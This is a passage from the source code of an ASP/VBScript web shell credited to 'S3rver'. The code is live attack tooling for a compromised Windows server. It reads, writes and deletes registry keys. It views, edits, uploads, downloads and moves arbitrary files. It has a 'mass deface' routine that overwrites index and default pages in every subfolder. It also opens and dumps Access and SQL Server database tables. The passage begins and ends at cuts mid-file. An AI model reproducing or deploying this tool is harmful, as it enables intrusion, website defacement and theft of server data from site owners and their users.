  528. Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
  529. Else
  530. Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAC?O</td></tr>"
  531. Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
  532. Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
  533. Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
  534. Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
  535. Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
  536. Response.Write "<table><tr><td><font face=""arial"" size=""2"">Type </td><td><font face=""arial"" size=""2""> Description </td><td><font face=""arial"" size=""2""> Figure </td></tr>"
  537. Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> String </td><td><font face=""arial"" size=""1""> String </td></tr>"
  538. Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> Number </td><td><font face=""arial"" size=""1""> DWORD </td></tr>"
  539. Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> Binary </td><td><font face=""arial"" size=""1""> VBArray DWORD </td></tr>"
  540. Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> String Expand (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> String </td></tr>"
  541. Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> Array Of Strings </td><td><font face=""arial"" size=""1""> VBArray Of Strings </td></tr></table>"
  542. Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
  543. Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
  544. Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
  545. Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
  546. Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
  547. Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
  548. Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
  549. Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
  550. Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
  551. Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
  552. Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
  553. Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
  554. Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
  555. Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
  556. End If
  557. Case "r"
  558. If Trim(Request.QueryString("process")) = "yes" Then
  559. Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
  560. Response.Write "Value: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
  561. Else
  562. Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
  563. Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
  564. Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
  565. Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
  566. Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
  567. Response.Write "<input type=""submit"" value=""OK""></form>"
  568. End If
  569. Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
  570. Case "d"
  571. If Trim(Request.QueryString("process")) = "yes" Then
  572. teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
  573. Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>Deleted."
  574. Else
  575. Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
  576. Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
  577. Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
  578. Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
  579. Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
  580. Response.Write "<input type=""submit"" value=""OK""></form>"
  581. End If
  582. Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
  583. Case Else
  584. Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">WRITE VALUE</a><br><br>"
  585. Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">READ VALUE</a><br><br>"
  586. Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETE KEY</a><br>"
  587. End Select
  588. Set WshShell = Nothing
  589. Case "txtview"
  590. checa = checking(cprthtml,keydec)
  591. Call hdr()
  592. Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
  593. file = Replace(Trim(Request.QueryString("file")),"|","\")
  594. Set fso = CreateObject("Scripting.FileSystemObject")
  595. Set a = fso.OpenTextFile(file)
  596. Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
  597. Set a = Nothing
  598. Set fso = Nothing
  599. Case "txtedit"
  600. checa = checking(cprthtml,keydec)
  601. Call hdr()
  602. Response.Write copyright & onlinehelp
  603. If Request.Form.Count = 0 Then
  604. file = Replace(Trim(Request.QueryString("file")),"|","\")
  605. Set fso = CreateObject("Scripting.FileSystemObject")
  606. Set a = fso.OpenTextFile(file)
  607. Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
  608. Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
  609. Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
  610. Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
  611. Set a = Nothing
  612. Set fso = Nothing
  613. Else
  614. Select Case Trim(Request.Form("savemethod"))
  615. Case "Save"
  616. Set fso = CreateObject("Scripting.FileSystemObject")
  617. novotexto = Trim(Request.Form("content"))
  618. novotexto = Split(novotexto,vbCrLf)
  619. Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
  620. For i = 0 To UBound(novotexto)
  621. objstream.WriteLine(novotexto(i))
  622. Next
  623. objstream.Close
  624. Set objstream = Nothing
  625. Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
  626. Case "Save as"
  627. Set fso = CreateObject("Scripting.FileSystemObject")
  628. novotexto = Trim(Request.Form("content"))
  629. novotexto = Split(novotexto,vbCrLf)
  630. caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
  631. Set objstream = fso.CreateTextFile(caminho,true,false)
  632. For i = 0 To UBound(novotexto)
  633. objstream.WriteLine(novotexto(i))
  634. Next
  635. objstream.Close
  636. Set objstream = Nothing
  637. Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
  638. Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
  639. Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
  640. Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
  641. Case Else
  642. caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
  643. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  644. Set MyFile = ObjFSO.GetFile(caminho)
  645. destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
  646. MyFile.Move (destino)
  647. If Err.Number = 0 Then
  648. Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
  649. Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
  650. End If
  651. End Select
  652. End If
  653. Case "download"
  654. Response.Buffer = True
  655. Response.Clear
  656. strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
  657. strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
  658. strFileType = Request.QueryString("type")
  659. if strFileType = "" then strFileType = "application/download"
  660. Set fso = Server.CreateObject("Scripting.FileSystemObject")
  661. Set f = fso.GetFile(strFilename)
  662. intFilelength = f.size
  663. Set f = Nothing
  664. Set fso = Nothing
  665. Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
  666. Response.AddHeader "Content-Length", intFilelength
  667. Response.Charset = "UTF-8"
  668. Response.ContentType = strFileType
  669. Set Stream = Server.CreateObject("ADODB.Stream")
  670. Stream.Open
  671. Stream.type = 1
  672. Stream.LoadFromFile strFileName
  673. Response.BinaryWrite Stream.Read
  674. Response.Flush
  675. Stream.Close
  676. Set Stream = Nothing
  677. Case "upload"
  678. If Request.QueryString("processupload") <> "yes" Then
  679. Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
  680. Response.Write "<TABLE BORDER=0>"
  681. Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
  682. Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
  683. Response.Write "</TABLE>"
  684. Else
  685. Set Uploader = New FileUploader
  686. Uploader.Upload()
  687. If Uploader.Files.Count = 0 Then
  688. Response.Write "File(s) not uploaded."
  689. Else
  690. For Each File In Uploader.Files.Items
  691. File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
  692. Response.Write "File Uploaded: " & File.FileName & "<br>"
  693. Response.Write "Size: " & File.FileSize & " bytes<br>"
  694. Response.Write "Type: " & File.ContentType & "<br><br>"
  695. Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
  696. Next
  697. End If
  698. End If
  699. Case "mass"
  700. checa = checking(cprthtml,keydec)
  701. Call hdr()
  702. Response.Write copyright & onlinehelp
  703. Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
  704. On Error Resume Next
  705. Set MonRep = ObjFSO.GetFolder(caminhodomass)
  706. Set ColFolders = MonRep.SubFolders
  707. for each folderItem in ColFolders
  708. destino1 = folderItem.path & "\index.htm"
  709. destino2 = folderItem.path & "\index.html"
  710. destino3 = folderItem.path & "\index.asp"
  711. destino4 = folderItem.path & "\index.cfm"
  712. destino5 = folderItem.path & "\index.php"
  713. destino6 = folderItem.path & "\default.htm"
  714. destino7 = folderItem.path & "\default.html"
  715. destino8 = folderItem.path & "\default.asp"
  716. destino9 = folderItem.path & "\default.cfm"
  717. destino10 = folderItem.path & "\default.php"
  718. MeuArquivo.Copy(destino1)
  719. MeuArquivo.Copy(destino2)
  720. MeuArquivo.Copy(destino3)
  721. MeuArquivo.Copy(destino4)
  722. MeuArquivo.Copy(destino5)
  723. MeuArquivo.Copy(destino6)
  724. MeuArquivo.Copy(destino7)
  725. MeuArquivo.Copy(destino8)
  726. MeuArquivo.Copy(destino9)
  727. MeuArquivo.Copy(destino10)
  728. Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
  729. If Err.Number = 0 Then
  730. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
  731. Else
  732. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
  733. End If
  734. Err.Number = 0
  735. Response.Flush
  736. If metodo = "brute" Then
  737. Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
  738. End If
  739. next
  740. End Sub
  741. Sub brutemass(caminho,massaction)
  742. If massaction = "test" Then
  743. On Error Resume Next
  744. Set MonRep = ObjFSO.GetFolder(caminho)
  745. Set ColFolders = MonRep.SubFolders
  746. Set ColFiles0 = MonRep.Files
  747. for each folderItem in ColFolders
  748. Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
  749. Set EachFolder = TotalFolders.SubFolders
  750. Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
  751. maindestino = folderItem.path & "\"
  752. MeuArquivo.Copy(maindestino)
  753. Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
  754. If Err.Number = 0 Then
  755. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
  756. Else
  757. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
  758. End If
  759. Err.Number = 0
  760. Response.Flush
  761. If EachFolder.count > 0 Then
  762. masscontador = 0
  763. for each subpasta in EachFolder
  764. masscontador = masscontador + 1
  765. destino = subpasta.path & "\"
  766. If masscontador = 1 Then
  767. destinofinal = destino
  768. pathfinal = subpasta.path
  769. Err.Number = 0
  770. MeuArquivo.Copy(destinofinal)
  771. Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
  772. If Err.Number = 0 Then
  773. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
  774. Else
  775. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
  776. End If
  777. Err.Number = 0
  778. Response.Flush
  779. Else
  780. MeuArquivo.Copy(destino)
  781. Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
  782. If Err.Number = 0 Then
  783. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
  784. Else
  785. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
  786. End If
  787. Err.Number = 0
  788. Response.Flush
  789. End If
  790. next
  791. masscontador = 0
  792. End If
  793. Response.Write "</table><br>"
  794. Call brutemass(folderItem.path & "\","test")
  795. next
  796. Set MonRep = Nothing
  797. Set ColFolders = Nothing
  798. Set ColFiles0 = Nothing
  799. Else
  800. If Request.Form.Count = 0 Then
  801. Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> Test and Deface root and sub directories.<br><br>"
  802. Response.Write "<b>Single:</b> Test and deface only root directories.<br><br>"
  803. Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
  804. Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
  805. Response.Write "<center><font face=""arial"" size=""2"">Deface Code:<br>"
  806. Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
  807. Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
  808. Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
  809. Response.Write "<input type=""submit"" value=""Deface ALL!""></center>"
  810. Response.Write "</form>"
  811. Else
  812. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  813. patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
  814. arquivomassdfc = patharquivotxt & "teste.txt"
  815. Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
  816. vetordelinhas = Split(Request.Form("content"),VbCrLf)
  817. For i = 0 To UBound(vetordelinhas)
  818. Arquivotxt.WriteLine(vetordelinhas(i))
  819. Next
  820. Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
  821.  
  822. If Request.Form("massopt") = "single" Then
  823. Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
  824. ElseIf Request.Form("massopt") = "brute" Then
  825. Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
  826. End If
  827. End If
  828. End If
  829. End Sub
  830. If Trim(Request.QueryString("massact")) = "test" Then
  831. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  832. patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
  833. arquivo = patharquivotxt & "_vti_cnf.log"
  834. Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
  835. Set MeuArquivo = ObjFSO.GetFile(arquivo)
  836. Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
  837. ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
  838. Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
  839. End If
  840. Case "fcopy"
  841. If Trim(Request.Form("submit1")) = "Copy" Then
  842. mptpath=Trim(Request.Form("path"))
  843. mptdest=Trim(Request.Form("cf"))
  844. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  845. isl = ""
  846. if Trim(Request.Form("islem"))="kopyala" then
  847. objFSO.CopyFolder mptpath,mptdest
  848. isl="Copied.."
  849. elseif Trim(Request.Form("islem"))="tasi" then
  850. objFSO.MoveFolder mptpath,mptdest
  851. isl="moved.."
  852. end if
  853.  
  854. response.Write "Command: "&isl
  855. response.Write "<br><font color=red>File From: </font>" & mptpath & "<br><font color=red>Copy to: </font>" & mptdest
  856. response.Write "<br>"
  857. Else
  858. Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=fcopy"">"
  859. Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Copy Path : </td><td>"
  860. Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"& Replace(Trim(Request.QueryString("path")),"|","\") &"' name=path><input type=hidden value='"&time&"' name=Time>"
  861. Response.Write "<input style='width:250; height:21' value='"& Replace(Trim(Request.QueryString("path")) & "\","|","\") &"' name=cf>"
  862. response.Write "<input type=submit value='Copy' style='height:22;width:70' id=submit1 name=submit1>"
  863. Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
  864. response.Write "<input type=radio name='islem' value='kopyala' checked>Copy"
  865. response.Write "<input type=radio name='islem' value='tasi'>Move"
  866. response.Write "</table>"
  867. response.Write "</form>"
  868. End IF
  869.  
  870. Case "filecopy"
  871. If Trim(Request.Form("submit1")) = "Copy" Then
  872. mptpath=Trim(Request.Form("path"))
  873. mptdest=Trim(Request.Form("cf"))
  874. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  875. isl = ""
  876. if Trim(Request.Form("islem"))="kopyala" then
  877. objFSO.CopyFile mptpath,mptdest
  878. isl="Copy.."
  879. elseif Trim(Request.Form("islem"))="tasi" then
  880. objFSO.MoveFile mptpath,mptdest
  881. isl="move.."
  882. end if
  883.  
  884. response.Write "Command: "&isl
  885. response.Write "<br><font color=red>File From: </font>" & mptpath & "<br><font color=red>Copy to: </font>" & mptdest
  886. response.Write "<br>"
  887. Else
  888. Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=filecopy"">"
  889. Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Copy Path : </td><td>"
  890. Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"& Replace(Trim(Request.QueryString("file")),"|","\") &"' name=path><input type=hidden value='"&time&"' name=Time>"
  891. Response.Write "<input style='width:250; height:21' value='"& Replace(Trim(Request.QueryString("file")),"|","\") &"' name=cf>"
  892. response.Write "<input type=submit value='Copy' style='height:22;width:70' id=submit1 name=submit1>"
  893. Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
  894. response.Write "<input type=radio name='islem' value='kopyala' checked>Copy"
  895. response.Write "<input type=radio name='islem' value='tasi'>Move"
  896. response.Write "</table>"
  897. response.Write "</form>"
  898. End IF
  899.  
  900.  
  901. Case "search"
  902. If (Trim(Request.Form("submit1")) = "Search") xor Trim(Request.QueryString("status"))<>"" Then
  903. showdisks=FALSE
  904. status5=Trim(Request.Form("status"))
  905. if status5="" then status5=Trim(Request.QueryString("status"))
  906. SELECT CASE status5
  907.  
  908. CASE "5"
  909. Response.Write "<center><b><font color=orange>"& Trim(Request.QueryString("path")) &"</font></b></center><br>"
  910. Response.Write "<table width=100% ><tr><td>"
  911. set f = objFSO.OpenTextFile(Trim(Request.QueryString("path")),1)
  912. Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
  913. if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunam?yor\nSistem dosyas?olabilir')</script>":Response.End
  914.  
  915.  
  916.  
  917. CASE "7":
  918. Response.Write "<b><font size=3>Tables</font></br><br>"
  919. Set objConn = Server.CreateObject("ADODB.Connection")
  920. Set objADOX = Server.CreateObject("ADOX.Catalog")
  921. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  922. objConn.ConnectionString = Trim(Request.QueryString("path"))
  923. objConn.Open
  924. objADOX.ActiveConnection = objConn
  925.  
  926. For Each table in objADOX.Tables
  927. If table.Type = "TABLE" Then
  928. Response.Write "<font face=wingdings size=5>4</font> <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=8&Path="& Trim(Request.QueryString("path")) &"&table="&table.Name&"'>"&table.Name&"</a><br>"
  929. End If
  930. Next
  931.  
  932. CASE "8":
  933. table=Trim(Request.QueryString("table"))
  934. Response.Write "<font color=red><h4>Table Name: " & table & "</h4></font><br><Br><br>"
  935. Set objConn = Server.CreateObject("ADODB.Connection")
  936. Set objRcs = Server.CreateObject("ADODB.RecordSet")
  937. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  938. objConn.ConnectionString = Trim(Request.QueryString("path"))
  939. objConn.Open
  940. objRcs.Open table,objConn, adOpenKeyset , , adCmdText
  941.  
  942. Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
  943. for i=0 to objRcs.Fields.count-1
  944. Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
  945. next
  946. Response.Write "</tr>"
  947. do while not objRcs.EOF
  948. Response.Write "<tr>"
  949. for i=0 to objRcs.Fields.count-1
  950. Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
  951. next
  952. Response.Write "</tr>"
  953. objRcs.MoveNext
  954. loop
  955. Response.Write "</table><br>"
  956.  
  957.  
  958. case "12": araBul Trim(Request.Form("path")),Trim(Request.Form("arama"))
  959.  
  960. END SELECT
  961.  
  962. Else
  963. showdisks=FALSE
  964. checa = checking(cprthtml,keydec)
  965. Call hdr()
  966. Response.Write "<form method=""post"" target=""_opener"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=search"">"
  967. Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>File Ext: </td><td>"
  968. Response.Write "&nbsp;<input type=hidden value='12' name=status>"
  969. Response.Write "<input type=hidden value=""" & Replace(Trim(Request.QueryString("path")),"|","\") & """ name=""path""><input style='width:250' value='mdb' name='arama'><input style='width:70; height:22' type=submit value='Search' name='submit1'>"
  970. Response.Write "</td></tr></table></form>"
  971. End IF
  972.  
  973.  
  974.  
  975. Case "sqlserver"
  976. If (Trim(Request.Form("submit1")) = "Execute SQL Server Command") xor Trim(Request.QueryString("status"))<>"" Then
  977. showdisks=FALSE
  978. status5=Trim(Request.Form("status"))
  979. if status5="" then status5=Trim(Request.QueryString("status"))
  980. SELECT CASE status5
  981.  
  982.  
  983. CASE "7":
  984. Response.Write "<b><font size=3>Tables</font></br><br>"
  985. Set objConn = Server.CreateObject("ADODB.Connection")
  986. Set objADOX = Server.CreateObject("ADOX.Catalog")
  987. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  988. objConn.ConnectionString = Trim(Request.QueryString("path"))
  989. objConn.Open
  990. objADOX.ActiveConnection = objConn
  991.  
  992. For Each table in objADOX.Tables
  993. If table.Type = "TABLE" Then
  994. Response.Write "<font face=wingdings size=5>4</font> <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=8&Path="& Trim(Request.QueryString("path")) &"&table="&table.Name&"'>"&table.Name&"</a><br>"
  995. End If
  996. Next
  997.  
  998. CASE "8":
  999. table=Trim(Request.QueryString("table"))
  1000. Response.Write "<font color=red><h4>Table Name: " & table & "</h4></font><br><Br><br>"
  1001. Set objConn = Server.CreateObject("ADODB.Connection")
  1002. Set objRcs = Server.CreateObject("ADODB.RecordSet")
  1003. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  1004. objConn.ConnectionString = Trim(Request.QueryString("path"))
  1005. objConn.Open
  1006. objRcs.Open table,objConn, adOpenKeyset , , adCmdText
  1007.  
  1008. Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
  1009. for i=0 to objRcs.Fields.count-1
  1010. Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
  1011. next
  1012. Response.Write "</tr>"
  1013. do while not objRcs.EOF
  1014. Response.Write "<tr>"
  1015. for i=0 to objRcs.Fields.count-1
  1016. Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
  1017. next
  1018. Response.Write "</tr>"
  1019. objRcs.MoveNext
  1020. loop
  1021. Response.Write "</table><br>"
  1022.  
  1023.  
  1024. END SELECT
  1025.  
  1026. Else
  1027. showdisks=FALSE
  1028. checa = checking(cprthtml,keydec)
  1029. Call hdr()
  1030.  
  1031. Response.Write "<form method=""post"" target=""_opener"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=sqlserver"">"
  1032. Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server connection string:</td></tr><tr><td align=center>"
  1033. Response.Write "<input type=hidden value='7' name=status>"
  1034. Response.Write "<input style='width:250; height:21' value='' name=path><br>"
  1035. response.Write "<input type=submit value='Execute SQL Server Command' style='height:23;width:220' id=submit1 name=submit1>"
  1036. Response.Write "</td></tr></table>"
  1037. response.Write "</form>"
  1038.  
  1039. End IF
  1040.  
  1041.  
  1042.  
  1043. Case "about"
  1044. showdisks=FALSE
  1045. checa = checking(cprthtml,keydec)
  1046. Call hdr()
  1047. response.Write "<br><br><br><body topmargin=5 leftmargin=0><center><h4>Coded By S3rver"
  1048. response.Write "<br><br>"
  1049. response.Write "<font size=2 color=Red face='courier new'>WebSite: :)</font>"
  1050. response.Write "<br>"
  1051. response.Write "<font size=2 color=Red face='courier new'>E-Mail: Pouya.S3rver@Gmail.Com</font>"
  1052. response.Write "<br><br>"
  1053. response.Write "<font size=2 color=Blue face='courier new'>Hackers, Crackers, Programmers Forever!</font>"
  1054.  
  1055.  
  1056. Case Else
  1057. checa = checking(cprthtml,keydec)
  1058. Call hdr()
  1059. Response.Write copyright & onlinehelp
  1060. Call showcontent()
  1061. End Select
  1062. If Err.Number <> 0 Then
  1063. Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse denied."
  1064. End If
  1065. Response.Write endcode
  1066.  
  1067. if showdisks then
  1068.  
  1069. %>
  1070.  
  1071. <script language=javascript>
  1072. // DRIVE ISLEMLERI
  1073. function driveGo(drive_){
  1074. location = "?raiz="+drive_+":";
  1075. }
  1076. </script>
  1077.  
  1078.  
  1079. <%
  1080.  
  1081.  
  1082. Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
  1083.  
  1084. Response.Write "<br><br><br><table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Drives</td></tr>"
  1085. for each drive_ in objFSO.Drives
  1086. Response.Write "<tr><td>"
  1087. Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
  1088. if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
